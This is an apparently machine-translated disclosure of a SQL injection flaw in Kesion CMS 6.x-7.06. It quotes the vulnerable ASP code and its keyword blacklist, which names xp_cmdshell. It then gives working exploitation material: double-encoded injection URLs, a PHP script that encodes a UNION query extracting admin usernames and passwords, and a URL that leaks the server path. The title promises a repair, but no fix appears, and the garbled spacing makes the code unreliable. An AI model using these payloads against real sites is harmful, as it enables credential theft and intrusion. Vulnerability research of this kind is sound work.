Coxun 6.x-7.06 SQL Injection defects and repair

 

Lines 24-46 and 254-270 of the vulnerability in \ User \ Reg \ RegAjax. asp on the registration page are as follows:
Class Ajax_Check
Private KS
Private Sub Class_Initialize ()
Set KS = New PublicCls
End Sub
Private Sub Class_Terminate ()
Set KS = Nothing
End Sub
Public Sub Kesion ()
 
Select Case KS. S ("Action ")
Case "checkusername"
Call CheckUserName ()
Case "checkemail"
Call CheckEmail ()
Case "checkcode"
Call CheckCode ()
Case "getregform"
Call GetRegForm ()
Case "getcityoption"
Call getCityOption ()
End Select
End Sub
 
...... Skip irrelevant code
 
Sub getCityOption ()
Dim Province, XML, Node
Province = UnEscape (KS. S ("Province") // note the following:
Dim RS: Set RS = Server. CreateObject ("ADODB. RECORDSET ")
RS. open "Select top 200. ID,. city From KS_Province a Inner Join KS_Province B On. parentID = B. ID Where B. city = '"& Province &" 'order by. orderid,. id ", conn, 1, 1
If Not RS. Eof Then
Set XML = KS. RsToXml (Rs, "row ","")
End If
RS. Close: Set RS = Nothing
If IsObject (XML) Then
For Each Node In XML. DocumentElement. SelectNodes ("row ")
KS. echo "<option value =" & node. selectSingleNode ("@ city "). text & ""> "& node. selectSingleNode ("@ city "). text & "</option>"
Next
End If
Set XML = Nothing
End Sub
End Class
In the above Code, Province = UnEscape (KS. S ("Province") calls the User-Defined Function KS. S for filtering, and then calls the UnEscape function for decoding!
The prototype of KS. S and UnEscape functions is as follows:

Function DelSql (Str)
Dim SplitSqlStr, SplitSqlArr, I
SplitSqlStr = "dbcc | alter | drop | * | and | exec | or | insert | select | delete | update | count | master | truncate | declare | char | mid | chr | set | where | xp_mongoshell"
SplitSqlArr = Split (SplitSqlStr, "| ")
For I = LBound (SplitSqlArr) To Ubound (SplitSqlArr)
If Instr (LCase (Str), SplitSqlArr (I)> 0 Then
Die "<script> alert ('System warning! \ N \ n1. The data you submit contains malicious characters "& SplitSqlArr (I) &"; \ n2. Your data has been recorded; \ n3. Your IP Address: "& GetIP &"; \ n4, Operation Date: "& Now &"; \ n Powered By Kesion. com! '); Window. close (); </script>"
End if
Next
DelSql = Str
End Function
'Get the value of Request. Querystring or Request. Form.
Public Function S (Str)
S = DelSql (Replace (Request (Str ),"'",""),"""",""))
End Function
The code here is messy, resulting in a vulnerability similar to php's secondary encoding. It is easy to use and can be combined:

Http://www.bkjia.com/user/reg/regajax. asp? Action = getcityoption & province = % 2527% 2520% 2575% 2569% 256e % 2520% 256f % 256e % 2553% 2565% 2565% 256c % 2563% 2574% 2520% 2574% 256f % 2570% 2520% 2531% 2530% 2520% 2541%

For ACCESS, MSSQL needs to change the SQL statement:

 

<? Php
$ Str = "'Union Select top 10 AdminID, UserName & chr (124) & PassWord From KS_Admin ";
For ($ I = 0; $ I <= strlen ($ str); $ I ++ ){
$ Temp. = "% 25". base_convert (ord ($ str [$ I]), 10, 16 );
}
Echo $ temp. "0 ";
?>
Modify 'Union Select top 10 AdminID, UserName & chr (124) & PassWord From KS_Admin to the corresponding SQL statement. (MSSQL direct backup is more convenient)
Because the CLng type conversion is performed during decoding, the submitted character can cause an error to pop up the physical path.
Explosion physical path: http://www.bkjia.com/user/reg/regajax. asp? Action = getcityoption & province = % 25i
:

Http://www.bkjia.com/user/reg/regajax. asp? Action = getcityoption & province = goingta % 2527% union % 2520 2520% 2573% 256C % 2565% 2565% 2563% 2574%, username % 252B % 25201 257C % 2527% 2527% Bpassword % 252 from % 2520KS_Admin % 2520

Author: my5t3ry